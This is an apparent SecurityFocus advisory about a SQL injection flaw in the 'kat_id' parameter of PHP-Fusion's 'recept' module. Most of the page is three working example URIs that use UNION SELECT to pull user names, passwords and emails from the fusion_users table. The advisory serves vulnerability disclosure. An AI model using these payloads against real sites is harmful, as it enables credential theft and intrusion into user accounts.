Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

PHP-Fusion 'recept' Module 'kat_id' Parameter SQL Injection Vulnerability

An attacker can exploit this issue via a browser.

The following example URIs are available:

http://www.example.com/infusions/recept/recept.php?click=kategorier&kat_id=-9999%27+and+1=2+union+all+select+1,2,user_name,4,5,6,7+from+fusion_users--+

http://www.example.com/infusions/recept/recept.php?click=kategorier&kat_id=-9999%27+and+1=2+union+all+select+1,2,user_password,4,5,6,7+from+fusion_users--+

http://www.example.com/infusions/recept/recept.php?click=kategorier&kat_id=-9999%27+and+1=2+union+all+select+1,2,user_email,4,5,6,7+from+fusion_users--+







 

Privacy Statement
Copyright 2008, SecurityFocus